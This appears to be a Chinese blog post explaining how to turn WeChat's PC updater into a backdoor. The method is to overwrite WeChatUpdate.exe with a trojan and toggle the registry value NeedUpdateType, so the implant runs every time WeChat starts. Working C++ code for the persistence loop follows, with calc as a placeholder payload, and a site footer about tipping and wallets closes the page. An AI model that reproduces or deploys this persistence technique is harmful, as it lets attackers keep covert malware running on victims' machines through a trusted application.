劫持WeChatUpdate.exe作为后门

发现微信pc端在启动的时候,会检查注册表中的NeedUpdateType >= 100 就会先启动微信安装目录下的wechatupdate.exe

可以利用这个思路写个劫持微信更新程序的后门,具体思路如下:
1.释放木马到微信安装目录,覆盖WeChatUpdate.exe
2.写注册表修改NeedUpdateType=100
3.被攻击者下次启动微信时,检测到NeedUpdateType=100,就会先启动微信目录下的后门程序
4.后门程序启动后,先还原注册表NeedUpdateType=0,再启动微信主程序
5.微信主程序启动成功后,延迟5秒,再把NeedUpdateType=100,下次启动微信时,开始重复第三步

为什么要延迟5秒,因为WeChatUpdate.exe在启动wechat.exe后,wechat.exe会立马再次查询注册表,并启动WeChatUpdate.exe,导致死循环…

#include <iostream>
#include <windows.h>


VOID HijackingUpdate()
{
    HKEY hKey = NULL;
    DWORD lpData = 0;
    do
    {
        WinExec("calc", SW_SHOW);

        if (RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Tencent\\WeChat", 0, 0xF003Fu, &hKey) || 
            RegSetValueExW(hKey, L"NeedUpdateType", 0, REG_DWORD, (const byte*)&lpData, sizeof(DWORD))||
            RegFlushKey(hKey)||
            RegCloseKey(hKey))
        {
            break;
        }

        // 2.启动微信主程序
        WinExec("WeChat.exe", SW_SHOW);

       
        // 3. 重新设置注册表NeedUpdateType <= 100, 这样下次启动微信时,先启动当前后门程序
        Sleep(5000);
        lpData = 100;
        if (RegOpenKeyExW(HKEY_CURRENT_USER, L"Software\\Tencent\\WeChat", 0, 0xF003Fu, &hKey) ||
            RegSetValueExW(hKey, L"NeedUpdateType", 0, REG_DWORD, (const byte*)&lpData, sizeof(DWORD)) ||
            RegFlushKey(hKey) ||
            RegCloseKey(hKey))
        {
            break;
        }

    } while (0);

}

#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
int main()
{
    HijackingUpdate();
}



评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值